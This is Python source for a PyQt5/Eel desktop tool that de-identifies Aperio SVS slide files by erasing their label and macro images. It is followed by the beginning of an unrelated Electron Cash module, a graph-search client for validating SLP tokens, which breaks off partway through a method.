# $ brew install pyenv //manages python environments to avoid messy system environment
# $ pyenv install <version> //whatever version you want - 3.8.2 as of 3/27/2020
# $ pyenv global <version> //(optional) set version to be your default
# $ echo -e 'eval "$(pyenv init -)"' >> ~/.bash_profile //restart terminal to apply changes
# Run from within a virtual environment (venv) to allow defined versions of all external modules
# $ python3 -m venv venv //creates venv folder within current directory
# $ source venv/bin/activate //activates virtual environment
# - all dependencies can be installed without conflicts here
# - dependency list:
# -- pip install Eel==0.12.2
# -- pip install PyQt5==5.14.1
# -- pip install tinynumpy (needed for tiffparser)
# -- pip install pyinstaller (to create application package)
# To install all dependencies at once:
# $ pip install Eel==0.12.2 PyQt5==5.14.1 tinynumpy pyinstaller
# os: for opening files
import os
# shutil: for copying files
import shutil
# struct: to pack/unpack data while writing binary files
import struct
# re: for regular expression parsing of file paths
import re
# copy: copy object rather than creating a reference
import copy
#threading.Thread: for async file copying
import threading
from threading import Thread
#csv: for reading csv file with filenames/destinations
import csv
#sys, platform: for checking which operating system is in use
import sys
import platform
# REQUIRED EXTERNAL LIBRARIES
# eel: for the html/css/javascript GUI
# $ pip install Eel==0.12.2
import eel
# tiffparser: stripped down version of tifffile
# located in root project folder alongside this file.
# removes need for numpy, which reduces application size significantly
# requires tinynumpy instead
# $ pip install tinynumpy
import tiffparser
# Parse Markdown to create options interface
import commonmark
from bottle import route
# pyqt5: python binding to Qt GUI framework, needed for file/directory picker dialog
# $ pip install PyQt5==5.14.1
# also requires qt5 to be installed
# - $ brew install qt5
from PyQt5.QtWidgets import QApplication, QFileDialog, QLabel, QMainWindow
from PyQt5.QtCore import QObject, pyqtSignal, QThread, QDir #, Qt
#useChrome = True # TODO: set this by commandline option
### ---- COMMENT ME OUT TO USE CHROME MODE - UNCOMMENT FOR QT MODE ---- ###
# from PyQt5.QtWebEngineWidgets import QWebEnginePage, QWebEngineView
# from PyQt5.QtCore import QUrl
# useChrome = False
# class EelThread(QThread):
# def __init__(self, parent = None, init='web',url='main.html'):
# QThread.__init__(self, parent)
# self.init = init
# self.url = url
# def run(self):
# # Note: This is never called directly. It is called by Qt once the
# # thread environment has been set up.
# eel.init(self.init)
# eel.start(self.url, block=True, mode=None)
### ---- END OF COMMENT ME OUT TO USE CHROME MODE - UNCOMMENT FOR QT MODE ---- ###
class ThreadsafeCaller(QObject):
    """Marshals an arbitrary function call onto the thread this object was created in.

    Qt widgets (e.g. QFileDialog) must run on the GUI thread, while eel handlers
    run on worker threads. `call()` detects cross-thread invocation and routes
    it through a signal/slot so the function executes on the owning thread,
    busy-waiting until the result arrives.
    """
    get_signal = pyqtSignal(QObject,dict)
    def __init__(self):
        super(ThreadsafeCaller, self).__init__()
        # Thread that owns this instance; used to detect cross-thread calls.
        self.threadid=int(QThread.currentThreadId())
        self.multithreading=False
        self.returnvalue=None # read-only from self; written by other
        self.waiting=False # read-only from self; written by other; atomic
    def _make(self):
        """Create a per-call helper, wired through a signal if calling across threads."""
        other = ThreadsafeCaller()
        # if constructed from a different thread, use signal-slot to make threadsafe
        if self.threadid != other.threadid:
            other.multithreading=True
            other.get_signal.connect(self._call)
        return other
    def _call(self,other,d):
        """Slot: run the packaged function and hand the result back to *other*."""
        # unpack and call the function; package returned value into dict to send by signal
        output={'result': d['f'](*d['args'], **d['kwargs'])}
        other.returnvalue=output
        other.waiting=False
        return output
    def _wait(self):
        """Spin (with short sleeps) until the owning thread has produced a result."""
        while self.waiting==True:
            QThread.msleep(20)
    def _callother(self,func,*args,**kwargs):
        """Invoke *func* directly or via the cross-thread signal; return its result."""
        # package arguments into dict to send via signal
        d={'f':func,'args':args,'kwargs':kwargs}
        if self.multithreading:
            self.waiting=True # set flag before triggering signal-slot
            self.get_signal.emit(self,d)
            self._wait()
            return self.returnvalue['result'] #unpack result from dict
        else:
            return self._call(self,d)['result'] #unpack result from dict
    def call(self,func,*args,**kwargs):
        """Public entry: run func(*args, **kwargs) on the owning thread, return its result."""
        other=self._make()
        return other._callother(func,*args,**kwargs)
# source: https://stackoverflow.com/a/44352931/1214731
# source: https://stackoverflow.com/a/44352931/1214731
def resource_path(relative_path):
    """ Get absolute path to resource, works for dev and for PyInstaller """
    # PyInstaller unpacks bundled data files into a temp dir exposed as
    # sys._MEIPASS; in development we fall back to this module's directory.
    try:
        base_path = sys._MEIPASS
    except AttributeError:
        base_path = os.path.dirname(os.path.abspath(__file__))
    return os.path.join(base_path, relative_path)
@route('/settings')
def settings():
    """Serve the settings page: settings.md rendered to HTML."""
    settings_file = resource_path('.') + '/settings.md'
    with open(settings_file, 'r') as fp:
        markdown_text = fp.read()
    return commonmark.commonmark(markdown_text)
@route('/readme')
def readme():
    """Serve the README and help documents as rendered HTML fragments."""
    readme_file = resource_path('.') + '/README.md'
    help_file = resource_path('.') + '/help.md'
    with open(readme_file, 'r') as fp, open(help_file, 'r') as hp:
        return {
            'readme': commonmark.commonmark(fp.read()),
            'help': commonmark.commonmark(hp.read()),
        }
# Read/modify TIFF files (as in the SVS files) using tiffparser library (stripped down tifffile lib)
# delete_associated_image will remove a label or macro image from an SVS file
def delete_associated_image(slide_path, image_type):
    """Erase the 'label' or 'macro' associated image from the SVS file at *slide_path*.

    Zeroes the image's pixel strips, tag values and IFD header in place, then
    unlinks its IFD from the page chain so readers no longer see the page.
    Mutates the file on disk; returns nothing.

    :param slide_path: path to the SVS file (opened read/write).
    :param image_type: 'label' or 'macro'.
    :raises Exception: for an unknown image_type, duplicate associated images,
        or a broken IFD chain.
    """
    # THIS WILL ONLY WORK FOR STRIPED IMAGES CURRENTLY, NOT TILED
    allowed_image_types=['label','macro'];
    if image_type not in allowed_image_types:
        raise Exception('Invalid image type requested for deletion')
    # NOTE(review): fp is never closed if one of the raises below fires --
    # consider try/finally or a `with` block.
    fp = open(slide_path, 'r+b')
    t = tiffparser.TiffFile(fp)
    # logic here will depend on file type. AT2 and older SVS files have "label" and "macro"
    # strings in the page descriptions, which identifies the relevant pages to modify.
    # in contrast, the GT450 scanner creates svs files which do not have this, but the label
    # and macro images are always the last two pages and are striped, not tiled.
    # The header of the first page will contain a description that indicates which file type it is
    first_page=t.pages[0]
    filtered_pages=[]
    if 'Aperio Image Library' in first_page.description:
        filtered_pages = [page for page in t.pages if image_type in page.description]
    elif 'Aperio Leica Biosystems GT450' in first_page.description:
        if image_type=='label':
            filtered_pages=[t.pages[-2]]
        else:
            filtered_pages=[t.pages[-1]]
    else:
        # default to old-style labeled pages
        filtered_pages = [page for page in t.pages if image_type in page.description]
    num_results = len(filtered_pages)
    if num_results > 1:
        raise Exception(f'Invalid SVS format: duplicate associated {image_type} images found')
    if num_results == 0:
        #No image of this type in the WSI file; no need to delete it
        return
    # At this point, exactly 1 image has been identified to remove
    page = filtered_pages[0]
    # get the list of IFDs for the various pages
    offsetformat = t.tiff.ifdoffsetformat
    offsetsize = t.tiff.ifdoffsetsize
    tagnoformat = t.tiff.tagnoformat
    tagnosize = t.tiff.tagnosize
    tagsize = t.tiff.tagsize
    unpack = struct.unpack
    # start by saving this page's IFD offset
    ifds = [{'this': p.offset} for p in t.pages]
    # now add the next page's location and offset to that pointer
    for p in ifds:
        # move to the start of this page
        fp.seek(p['this'])
        # read the number of tags in this page
        (num_tags,) = unpack(tagnoformat, fp.read(tagnosize))
        # move forward past the tag defintions
        fp.seek(num_tags*tagsize, 1)
        # add the current location as the offset to the IFD of the next page
        p['next_ifd_offset'] = fp.tell()
        # read and save the value of the offset to the next page
        (p['next_ifd_value'],) = unpack(offsetformat, fp.read(offsetsize))
    # filter out the entry corresponding to the desired page to remove
    pageifd = [i for i in ifds if i['this'] == page.offset][0]
    # find the page pointing to this one in the IFD list
    previfd = [i for i in ifds if i['next_ifd_value'] == page.offset]
    # check for errors
    if(len(previfd) == 0):
        raise Exception('No page points to this one')
        # NOTE(review): unreachable -- this return sits after the raise.
        return
    else:
        previfd = previfd[0]
    # get the strip offsets and byte counts
    offsets = page.tags['StripOffsets'].value
    bytecounts = page.tags['StripByteCounts'].value
    # iterate over the strips and erase the data
    for (o, b) in zip(offsets, bytecounts):
        fp.seek(o)
        fp.write(b'\0'*b)
    # iterate over all tags and erase values if necessary
    for key, tag in page.tags.items():
        fp.seek(tag.valueoffset)
        fp.write(b'\0'*tag.count)
    offsetsize = t.tiff.ifdoffsetsize
    offsetformat = t.tiff.ifdoffsetformat
    pagebytes = (pageifd['next_ifd_offset']-pageifd['this'])+offsetsize
    # next, zero out the data in this page's header
    fp.seek(pageifd['this'])
    fp.write(b'\0'*pagebytes)
    # finally, point the previous page's IFD to this one's IFD instead
    # this will make it not show up the next time the file is opened
    fp.seek(previfd['next_ifd_offset'])
    fp.write(struct.pack(offsetformat, pageifd['next_ifd_value']))
    fp.close()
def get_csv_message():
    """Return the user-facing hint describing the required CSV manifest layout."""
    message = 'CSV files must contain exactly two columns named "source" and "destination" in order to be processed.'
    return message
def parse_csv(file, filelist, invalid):
    """Expand a CSV manifest into *filelist* (valid Aperio rows) and *invalid*.

    The CSV must have exactly two columns, "source" and "destination"
    (case-insensitive). Rows whose source is not a valid Aperio file, or a
    *file* that is not a parseable CSV at all, are appended to *invalid*.
    Mutates both lists in place; always returns None.
    """
    try:
        with open(file, newline='') as csvfile:
            reader = csv.DictReader(csvfile, delimiter=',', quotechar='"')
            fields = ['source','destination']
            header=[h.strip().lower() for h in reader.fieldnames]
            if len(header)!=2 or any([h not in fields for h in header]):
                raise ValueError(get_csv_message())
            # Map canonical names back to the possibly differently-cased headers.
            fieldmap={f: list(filter(lambda l: l.strip().lower()==f, reader.fieldnames))[0] for f in fields }
            for row in reader:
                src=row[fieldmap['source']]
                dest=row[fieldmap['destination']]
                file_format=detect_format(src)
                if file_format=='Aperio':
                    filelist.append({
                        'file':src,
                        'format':file_format,
                        'destination':dest
                    })
                else:
                    invalid.append({'file':src}) #not a valid Aperio file
    except ValueError as e:
        # Add this file to the list of invalid files (it wasn't a valid CSV file)
        invalid.append({'file':file})
    finally:
        # NOTE(review): `return` inside `finally` also swallows any in-flight
        # exception other than ValueError -- confirm this is intentional.
        return
def detect_format(filename):
    """Return 'Aperio' if *filename* is an Aperio TIFF/SVS file, else None.

    Any failure (unreadable file, not a TIFF, ...) is printed and yields None.
    """
    retval = None
    try:
        with open(filename, 'rb') as fp:
            t = tiffparser.TiffFile(fp)
            # Aperio files announce themselves in the first page's ImageDescription.
            description = t.pages[0].description
            if description.startswith('Aperio'):
                retval = 'Aperio'
    except Exception as e:
        print('Exception in detect_format:',e)
    finally:
        return retval
def add_description(f):
    """Attach file size and parsed TIFF ImageDescription metadata to *f*.

    Populates f['filesize'] and f['description'] (a dict of Aperio header
    fields) in place. Errors are printed and the entry is returned unchanged.
    :param f: a file-entry dict containing at least a 'file' path.
    :returns: the same dict, for chaining.
    """
    try:
        f['filesize'] = os.stat(f['file']).st_size
        with open(f['file'], 'rb') as fp:
            t = tiffparser.TiffFile(fp)
            # Aperio descriptions are delimited by ';', '|' or line breaks.
            # Raw strings fix the invalid escape sequences ('\|', '\s') that the
            # previous non-raw literals emitted DeprecationWarnings for.
            desc = re.split(r';|\||\r\n?', t.pages[0].description)
            a = {}
            for idx, item in enumerate(desc):
                if item.startswith('Aperio'):
                    a[item.strip()] = desc[idx+1]
                elif re.match(r'^[A-Za-z\s]+\s=', item):
                    parts = item.split(' = ')
                    a[parts[0]] = parts[1]
            f['description'] = a
    except Exception as e:
        print('Exception in add_description:', e)
    finally:
        return f
def get_filename(f):
    """Return the last path component of *f*, splitting on the Qt-normalized separator."""
    separator = QDir.fromNativeSeparators(os.path.sep)
    parts = f.split(separator)
    return parts[-1]
def parse_files(files):
    """Classify a selection into valid Aperio SVS entries and invalid files.

    Non-Aperio selections are treated as possible CSV manifests and expanded
    via parse_csv. Returns {'aperio': [...], 'invalid': [...]}.
    """
    fileinfo = [{'file': f, 'format': detect_format(f), 'destination': get_filename(f)}
                for f in files]
    aperio = []
    non_aperio = []
    for info in fileinfo:
        if info['format'] == 'Aperio':
            aperio.append(info)
        else:
            non_aperio.append(info)
    invalid = []
    # Each non-Aperio selection may be a CSV manifest; expanding it appends
    # into `aperio` / `invalid` in place.
    for info in non_aperio:
        parse_csv(info['file'], aperio, invalid)
    return {'aperio': [add_description(f) for f in aperio], 'invalid': invalid}
def inplace_info(f):
    """Probe one file entry for in-place editability, then push it to the GUI.

    Mutates *f* in place with 'writable', 'has_label' and 'has_macro' keys and
    forwards the updated entry to the front end via eel.
    """
    with open(f['file'],'r+b') as fp:
        f['writable']=fp.writable()
        t = tiffparser.TiffFile(fp)
        # Label/macro pages are tagged via their page description strings.
        label = [page for page in t.pages if 'label' in page.description]
        macro = [page for page in t.pages if 'macro' in page.description]
        f['has_label']=len(label)>0
        f['has_macro']=len(macro)>0
    eel.add_inplace_file(f)
def get_inplace_info(fs):
    """Collect in-place editability info for every Aperio entry in *fs*.

    inplace_info pushes its results to the GUI as a side effect, so a plain
    loop is used rather than a list comprehension built only to be discarded.
    """
    for f in fs['aperio']:
        inplace_info(f)
def parse_inplace_files(files):
    """Parse a selection for in-place deidentification.

    Returns the parsed file structure immediately; per-file writability and
    label/macro details are gathered on a worker thread (results are pushed to
    the GUI via eel callbacks) so the app stays responsive.
    """
    fs = parse_files(files)
    worker = threading.Thread(target=get_inplace_info, args=[fs])
    worker.start()
    return fs
# File Dialog methods
# use Filebrowser objects for thread safety via signal-slot mechanisms
# filedialog = Filebrowser()
# Single shared caller used to marshal dialog invocations onto the Qt GUI thread.
tsc = ThreadsafeCaller()
@eel.expose
def get_files(dlgtype='native', path=''):
    """Show a file picker (on the GUI thread) and return the parsed selection."""
    result = tsc.call(get_files_, dlgtype=dlgtype, path=path)
    chosen_dir = result['absolutePath']
    # Remember the browsed directory so the next dialog opens there.
    if chosen_dir != False:
        eel.set_follow_source(chosen_dir)
    return parse_files(result['files'])
@eel.expose
def get_dir(dlgtype='native', path=''):
    """Show a directory picker and return the choice plus disk-space/writability info."""
    result = tsc.call(get_dir_, dlgtype=dlgtype, path=path)
    chosen_dir = result['absolutePath']
    # Remember the browsed directory so the next dialog opens there.
    if chosen_dir != False:
        eel.set_follow_dest(chosen_dir)
    directory = result['directory']
    if directory != '':
        total, used, free = shutil.disk_usage(directory)
        result['total'] = total
        result['free'] = free
        result['writable'] = os.access(directory, os.W_OK)
    return result
@eel.expose
def get_inplace_files(dlgtype='native', path=''):
    """Show a file picker and return the selection parsed for in-place deidentification."""
    result = tsc.call(get_files_, dlgtype=dlgtype, path=path)
    chosen_dir = result['absolutePath']
    # Remember the browsed directory so the next dialog opens there.
    if chosen_dir != False:
        eel.set_follow_source(chosen_dir)
    return parse_inplace_files(result['files'])
@eel.expose
def get_inplace_dir(dlgtype='native', path=''):
    """Pick a directory and recursively gather every .svs file inside it for in-place editing."""
    result = tsc.call(get_dir_, dlgtype=dlgtype, path=path)
    chosen_dir = result['absolutePath']
    if chosen_dir != False:
        eel.set_follow_dest(chosen_dir)
    print('directory chosen:', result['directory'])
    # Walk the tree and collect .svs files, normalizing separators to '/'.
    svs_files = []
    for dirpath, dirnames, filenames in os.walk(result['directory']):
        for name in filenames:
            if os.path.splitext(name)[1].lower() == '.svs':
                svs_files.append(os.path.join(dirpath, name).replace('\\', '/'))
    return parse_inplace_files(svs_files)
@eel.expose
def test_file_dialog(dlgtype,path=''):
    # Debug/diagnostic hook: run the raw file dialog and return its result unprocessed.
    return tsc.call(get_files_, dlgtype=dlgtype, path=path)
@eel.expose
def get_config_path(dlgtype='native', path=''):
    """Show a directory picker for choosing a configuration location."""
    # Pass dlgtype by keyword for consistency with the other dialog wrappers
    # (get_files/get_dir), which all forward it as dlgtype=dlgtype.
    return tsc.call(get_dir_, dlgtype=dlgtype, path=path)
def get_files_(dlgtype='native', path=''):
    """Run a Qt multi-file picker; must execute on the GUI thread (via ThreadsafeCaller).

    :param dlgtype: 'qt' forces the Qt-rendered dialog; anything else uses the native one.
    :param path: initial directory, used only if it exists.
    :returns: dict with 'files' (selected paths, possibly empty) and
              'absolutePath' (dialog directory, or False if cancelled).
    """
    if path is None:
        path=''
    dialog = QFileDialog(None)
    dialog.setFileMode(QFileDialog.ExistingFiles)
    dialog.setViewMode(QFileDialog.Detail)
    if dlgtype=='qt': # default to native unless qt is explicitly requested
        dialog.setOption(QFileDialog.DontUseNativeDialog, True)
    dialog.setNameFilters(['Aperio SVS or CSV (*.svs *.csv)'])
    if len(path)>0 and QDir(path).exists():
        dialog.setDirectory(path)
    files = []
    absolutepath=False
    if dialog.exec() == QFileDialog.Accepted:
        dlg_out = dialog.selectedFiles()
        files = dlg_out
        absolutepath=dialog.directory().absolutePath()
    output = {
        'files':files,
        'absolutePath':absolutepath
    }
    return output
def get_dir_(dlgtype='native', path=''):
    """Run a Qt directory picker; must execute on the GUI thread (via ThreadsafeCaller).

    :param dlgtype: 'qt' forces the Qt-rendered dialog; anything else uses the native one.
    :param path: initial directory, used only if it exists. (Bug fix: the
        default used to be the bogus literal 'path'; '' matches get_files_ and
        makes the initial-directory check a clean no-op.)
    :returns: dict with 'directory' (chosen directory or '') and
              'absolutePath' (dialog directory, or False if cancelled).
    """
    if path is None:
        path = ''
    dialog = QFileDialog(None)
    dialog.setFileMode(QFileDialog.Directory)
    dialog.setOption(QFileDialog.ShowDirsOnly, True)
    if dlgtype == 'qt':  # default to native unless qt is explicitly requested
        dialog.setOption(QFileDialog.DontUseNativeDialog, True)
    dialog.setViewMode(QFileDialog.Detail)
    if len(path) > 0 and QDir(path).exists():
        dialog.setDirectory(path)
    directory = ''
    absolutepath = False
    if dialog.exec() == QFileDialog.Accepted:
        dlg_out = dialog.selectedFiles()
        directory = dlg_out[0]
        absolutepath = dialog.directory().absolutePath()
    output = {
        'directory': directory,
        'absolutePath': absolutepath,
    }
    return output
@eel.expose
def do_copy_and_strip(files):
    """Kick off the copy-and-deidentify pipeline for *files*; returns immediately.

    Builds a shared CopyOp progress structure, then starts one worker thread
    that copies/strips the files sequentially and another that streams
    progress updates back to the GUI.
    """
    copyop = CopyOp([{'source':f['source'],
                      'dest':None,
                      'id':f['id'],
                      'filesize':os.stat(f['source']).st_size,
                      'done':False,
                      'renamed':False,
                      'failed':False,
                      'failure_message':''} for f in files])
    threading.Thread(target=track_copy_progress, args=[copyop]).start()
    threading.Thread(target=copy_and_strip_all, args=[files, copyop]).start()
    return 'OK'
@eel.expose
def do_strip_in_place(file):
    """Remove the label and macro images from *file* directly (no copy).

    Returns 'ok' on success, or an error string for the GUI on failure.
    """
    try:
        print(f'Deidentifying {file}...')
        for image_type in ('label', 'macro'):
            delete_associated_image(file, image_type)
        print("Stripped", file)
    except Exception as e:
        print(f'Exception deidentifying {file}: {e}')
        return 'There was a problem deleting associated images from this file'
    return 'ok'
@eel.expose
def check_free_space(directory):
    """Return the number of free bytes on the volume containing *directory*."""
    usage = shutil.disk_usage(directory)
    return usage.free
# Threading-related methods
# CopyOp: thread-safe file info to share data between copy and progress threads
class CopyOp(object):
    """Lock-protected list of per-file copy-state dicts shared across threads.

    `value` holds the live state mutated by the copy thread; `original` keeps
    an immutable snapshot of the initial state so the progress tracker can
    diff against it.
    """
    def __init__(self, start=None):
        """
        :param start: initial list of per-file state dicts (default: empty).
        """
        self.lock = threading.Lock()
        # Avoid the shared-mutable-default pitfall of `start=[]`.
        self.value = [] if start is None else start
        # Snapshot (not alias) the starting state: update() mutates the dicts
        # inside `value` in place, so an aliased `original` would silently
        # track those changes and defeat change-detection in the tracker.
        self.original = copy.deepcopy(self.value)
    def update(self, index, val):
        """Merge *val* into the state dict at *index*, under the lock."""
        with self.lock:
            for key, value in val.items():
                self.value[index][key] = value
    def read(self):
        """Return a deep copy of the current state, taken under the lock."""
        with self.lock:
            return copy.deepcopy(self.value)
def file_progress(b):
    """Return the number of bytes copied so far for copy-state dict *b*.

    Reports the destination file's current size, or 0 when the destination
    has not been assigned or created yet.
    """
    dest = b['dest']
    # Check both conditions: the destination must be assigned AND the new file
    # must already exist before its current size can be queried.
    if dest is not None and os.path.isfile(dest):
        return os.stat(dest).st_size
    return 0
# def track_copy_progress: update the GUI with progress of copy operations
def track_copy_progress(copyop):
    """Poll *copyop* and push destination/progress/finalization updates to the GUI.

    Runs in its own thread until every file is marked done. Each iteration
    diffs the current state against the previous snapshot and reports only
    what changed.
    """
    # Start with the original file structure, in case it has already updated by the time this thread executes
    o = copyop.original
    while(any([f['done']==False for f in o])):
        try:
            n=copyop.read()
            # Destinations assigned (or renamed) since the last poll.
            d=[{'id':b['id'],'dest':b['dest'],'renamed':b['renamed']}
               for a, b in zip(o,n) if a['dest']!=b['dest'] ]
            # Byte-level progress for every file still in flight.
            p=[{'id':b['id'],'progress':file_progress(b)} for b in n if b['done']==False ]
            # Files that transitioned to done since the last poll.
            f = [b for a,b in zip(o,n) if a['done']!=b['done'] ]
            #send updates to javascript/GUI
            eel.update_progress({'destinations':d,'progress':p,'finalized':f})
            #copy new values to old to track what needs updating still
            o = n
        except Exception as e:
            print('Exception in track_copy_progress:',e)
        #rate limit this progress reporting
        eel.sleep(0.03)
    print('Finished tracking progress')
# copy_and_strip_all: iterate over all files and copy and remove labels
def copy_and_strip_all(files, copyop):
    """Copy and deidentify every file in order, updating *copyop* as it goes."""
    # A plain loop (not a list comprehension) -- this runs purely for side effects.
    for index, file in enumerate(files):
        copy_and_strip(file, copyop, index)
# copy_and_strip: single file copy/deidentify operation.
# to be done in a thread for concurrent I/O using CopyOp object for progress updates
def copy_and_strip(file, copyop, index):
    """Copy file['source'] to file['dest'], strip label/macro images, and record progress.

    Intended to run on a worker thread; all state changes go through *copyop*
    so the tracker thread can report them. On a destination name collision the
    copy is renamed with a "(N)" suffix. On any failure the partial copy is
    removed and the failure recorded; the entry is always marked done.
    """
    # clean the paths of improper file separators for the OS
    oldname = os.path.sep.join(re.split(r'[\\\/]', file['source']))
    newname = os.path.sep.join(re.split(r'[\\\/]', file['dest']))
    # remove the filename leaving just the path
    dest_path = os.path.sep.join(newname.split(os.path.sep)[:-1])
    try:
        # create the destination directory if necessary
        os.makedirs(dest_path, exist_ok=True)
        filename, file_extension = os.path.splitext(newname)
        if not os.path.exists(newname):  # folder exists, file does not
            copyop.update(index, {'dest': newname})
            shutil.copyfile(oldname, newname)
        else:  # destination exists: append "(N)" to the stem until the name is free.
            # Bug fix: the suffix template previously discarded the destination
            # stem/path entirely; it must build on `filename`.
            ii = 1
            while True:
                test_newname = f'{filename}({ii}){file_extension}'
                if not os.path.exists(test_newname):
                    newname = test_newname
                    copyop.update(index, {'dest': newname, 'renamed': True})
                    shutil.copyfile(oldname, newname)
                    break
                ii += 1
        print('Deidentifying...')
        delete_associated_image(newname, 'label')
        delete_associated_image(newname, 'macro')
        print("Copied", oldname, "as", newname)
    except Exception as e:
        # Remove the (possibly partial) copy so a non-deidentified WSI is
        # never left at the destination.
        try:
            os.remove(newname)
        except FileNotFoundError:
            pass
        finally:
            copyop.update(index, {'failed': True, 'failure_message': f'{e}'})
            print(f"Deidentification of {oldname} -> {newname} failed; removed copy of WSI file.\nException: {e}\n")
    finally:
        # Always finalize the entry so the progress tracker can terminate.
        copyop.update(index, {'done': True})
    return
|
slp_graph_search.py | """
SLP Graph Search Client
Performs a background search and batch download of graph
transactions from a Graph Search server. For more information about
a Graph Search server see:
* gs++: https://github.com/blockparty-sh/cpp_slp_graph_search
* bchd: https://github.com/simpleledgerinc/bchd/tree/graphsearch
This class is currently only used by slp_validator_0x01.py.
The NFT1 validator has not yet been attached to the graph search client.
Servers can be added or removed using "lib/servers_slpdb.json" and
"lib/servers_slpdb_testnet.json". Currently only the bchd has been tested
with the validation cache excludes.
"""
import sys
import time
import threading
import queue
import traceback
import weakref
import collections
import json
import base64
import requests
import codecs
import random
from operator import itemgetter
from .transaction import Transaction
from .caches import ExpiringCache
from electroncash import networks
from . import slp_validator_0x01
class _GraphSearchJob:
    """Tracks a single graph-search download performed for one validation job.

    Holds progress/status metadata (read by the UI) and an expiring in-memory
    cache of the transactions downloaded from the graph search server, which
    the validator later retrieves via get_tx().
    """

    def __init__(self, valjob):
        # valjob: the slp_validator_0x01 validation job this search feeds
        self.root_txid = valjob.root_txid
        self.valjob = valjob
        # metadata fetched from back end
        self.depth_map = None
        self.total_depth = None
        self.txn_count_total = None
        self.validity_cache_size = 0
        # job status info
        self.search_started = False
        self.search_success = None  # None = undetermined; True/False once finished
        self.job_complete = False
        self.exit_msg = ''
        self.depth_current_query = None
        self.txn_count_progress = 0
        self.gs_response_size = 0
        self.last_search_url = '(url empty)'
        # ctl
        self.waiting_to_cancel = False
        self.cancel_callback = None
        # gs job results cache - clears data after 30 minutes
        self._txdata = ExpiringCache(maxlen=10000000, name="GraphSearchTxnFetchCache", timeout=1800)

    def sched_cancel(self, callback=None, reason='job canceled'):
        """Request cancellation; the search thread performs the actual cancel
        (via _cancel) the next time it examines this job."""
        self.exit_msg = reason
        if self.job_complete:
            return
        if not self.waiting_to_cancel:
            self.waiting_to_cancel = True
            self.cancel_callback = callback

    def set_success(self):
        """Mark the job finished successfully."""
        self.search_success = True
        self.job_complete = True

    def set_failed(self, reason=None):
        """Mark the job finished unsuccessfully, recording `reason`."""
        self.search_started = True
        self.search_success = False
        self.job_complete = True
        self.exit_msg = reason

    def get_tx(self, txid: str) -> object:
        ''' Attempts to retrieve txid from the tx cache that this class
        keeps in-memory. Returns None on failure. The returned tx is
        not deserialized, and is a copy of the one in the cache. '''
        tx = self._txdata.get(txid)
        if tx is not None and tx.raw:
            # make sure to return a copy of the transaction from the cache
            # so that if caller does .deserialize(), *his* instance will
            # use up 10x memory consumption, and not the cached instance which
            # should just be an undeserialized raw tx.
            return Transaction(tx.raw)
        return None

    def put_tx(self, tx: "Transaction", txid: str = None):
        ''' Puts a non-deserialized copy of tx into the tx_cache.

        FIX: annotation corrected from `bytes` -- the body reads tx.raw and
        get_tx() expects a Transaction-like object in the cache.
        '''
        txid = txid or Transaction._txid(tx.raw)  # optionally, caller can pass-in txid to save CPU time for hashing
        self._txdata.put(txid, tx)

    def get_job_cache(self, *, max_size=-1, is_mint=False):
        ''' Get validity cache (list of valid txid hex strings) for a token graph.

        max_size=-1 returns a cache with no size limit
        is_mint is used to further limit which txids are included in the cache
        for mint transactions, since other mint transactions are the only
        validation contributors
        NOTE(review): is_mint is currently unused by this implementation --
        confirm whether mint filtering was ever wired up.
        '''
        if max_size == 0:
            return []
        wallet = self.valjob.ref()
        if not wallet:
            # wallet was closed/garbage-collected; nothing to build from
            return []
        token_id = self.valjob.graph.validator.token_id_hex
        gs_cache = []
        # get valid txid cache from the graph
        gs_cache = self.valjob.graph.get_valid_txids(max_size=max_size, exclude=gs_cache)
        # pull valid txids from wallet storage to top up the cache
        sample_size = 0
        if max_size > 0 and len(gs_cache) < max_size:
            sample_size = max_size - len(gs_cache)
        if sample_size > 0:
            # copy to avoid mutation races with the wallet's own threads
            wallet_val = self.valjob.validitycache.copy()
            wallet_tok_info = wallet.tx_tokinfo.copy()
            for txid, val in wallet_val.items():
                _token_id = wallet_tok_info.get(txid, {}).get("token_id", None)
                if _token_id == token_id and val == 1:
                    sample_size -= 1
                    if sample_size < 0:
                        break
                    gs_cache.append(txid)
        # de-duplicate, then limit the size of the cache if required
        gs_cache = list(set(gs_cache))
        if gs_cache and max_size > 0 and len(gs_cache) > max_size:
            # FIX: random.sample picks WITHOUT replacement, so exactly max_size
            # unique txids are kept; the previous random.choices call sampled
            # with replacement and could return fewer unique entries.
            gs_cache = random.sample(gs_cache, max_size)
        # update the cache size variable used in the UI
        self.validity_cache_size = len(gs_cache)
        return gs_cache

    def _cancel(self):
        """Finalize the job as canceled and invoke the scheduled callback."""
        self.job_complete = True
        self.search_success = False
        if self.cancel_callback:
            self.cancel_callback(self)
class _SlpGraphSearchManager:
    """
    A single background thread that processes graph search requests
    sequentially off an internal queue.

    A module-level instance (slp_gs_mgr) is shared; the GUI is attached
    later via bind_gui() so the config-backed properties can function.
    """

    def __init__(self, threadname="GraphSearch"):
        # holds the job history and status, keyed by root txid
        self._search_jobs = dict()
        # callable returning the gui object (set via bind_gui), or None
        self._gui_object = None
        self.lock = threading.Lock()
        # Single-consumer queue serviced by the search thread
        self.search_queue = queue.Queue()  # TODO: make this a PriorityQueue based on dag size
        self.threadname = threadname
        self.search_thread = threading.Thread(target=self.mainloop, name=self.threadname + '/search', daemon=True)
        self.search_thread.start()
        # total number of bytes downloaded by graph search (all jobs)
        self.bytes_downloaded = 0

    def bind_gui(self, gui):
        """Attach the GUI accessor (a callable returning the gui object)."""
        self._gui_object = gui

    @property
    def slp_validity_signal(self):
        # None until a GUI is bound
        if not self._gui_object:
            return
        return self._gui_object().slp_validity_signal

    @property
    def slp_validation_fetch_signal(self):
        # None until a GUI is bound
        if not self._gui_object:
            return
        return self._gui_object().slp_validation_fetch_signal

    @property
    def gs_enabled(self):
        """Truthy iff a GUI is bound AND graph search is enabled in config."""
        return self._gui_object and self._gui_object().config.get('slp_validator_graphsearch_enabled', False)

    def _set_gs_enabled(self, enable):
        self._gui_object().config.set_key('slp_validator_graphsearch_enabled', enable)

    @property
    def gs_host(self):
        """Configured graph-search host, migrating the pre-upgrade key if needed."""
        host = self._gui_object().config.get('slp_validator_graphsearch_host', '')
        if not host:
            # handle case for upgraded config key name
            host = self._gui_object().config.get('slp_gs_host', '')
            # FIX: migrate a *found* legacy value to the new key. Previously the
            # condition was inverted (`if not host`), which only ever wrote an
            # empty string and never performed the migration.
            if host:
                self.set_gs_host(host)
        return host

    def set_gs_host(self, host):
        self._gui_object().config.set_key('slp_validator_graphsearch_host', host)

    def get_gs_job(self, valjob):
        """
        Returns the GS job object; if a new job is created it is also added
        to the gs queue for the search thread to service.
        """
